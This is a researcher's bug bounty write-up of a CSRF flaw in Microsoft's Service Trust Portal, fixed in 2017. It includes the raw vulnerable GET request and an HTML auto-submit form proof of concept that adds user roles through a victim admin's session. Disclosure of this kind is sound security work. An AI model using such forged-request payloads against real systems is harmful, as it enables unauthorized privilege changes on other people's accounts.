Microsoft CSRF Vulnerability
I am Adesh Nandkishor Kolte, an independent security researcher from India, and I also work with SecureLayer7 as a security consultant.
Talking about the Microsoft bug bounty, the first point is that they only accept submissions with high impact. A big `NO` to low-hanging fruit, and a big `NO` if you cannot exploit the bug. I was testing one of Microsoft's domains, the Service Trust Portal (STP).
During testing, I came across a feature in the portal where you can add Portal Users and Portal Admins. The Add User feature caught my attention. Generally speaking, while checking out an application I always try to correlate the application workflow with the different attack vectors I could execute, so straight away I thought about CSRF.
Vulnerable URL:
https://trustportal.office.com/onboarding/AddUserRole
POC:-
HTTP Request:-
GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive
From the above HTTP request we can see that there is no CSRF token. The role assignment is a state-changing action performed over a plain GET, authenticated by nothing but the session cookie, which the browser attaches to cross-site requests as well.
Using this loophole I was able to add user roles on behalf of the admin user.
Exploitation:-
<!-- Hosted on an attacker-controlled page: submitting the form makes the victim's
     browser send GET /onboarding/AddUserRole/1110?role=User with the victim's
     trustportal.office.com session cookie attached -->
<html>
<body>
<form action="https://trustportal.office.com/onboarding/AddUserRole/1110" method="GET">
<input type="hidden" name="role" value="User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
So I was able to add any user to their Cloud Service Trust Portal using a CSRF attack.
They listed me in their Hall of Fame and rewarded me with a bounty.
Aug 14, 2017: Reported to Microsoft Security Response Center.
Aug 20, 2017: Received initial reply from the Microsoft team; report triaged.
Aug 25, 2017: Microsoft Security Team successfully reproduced the bug.
Sep 16, 2017: Microsoft Security Team fixed the reported bug.
Oct 01, 2017: Bounty of $500 awarded by Microsoft.
Disclosed.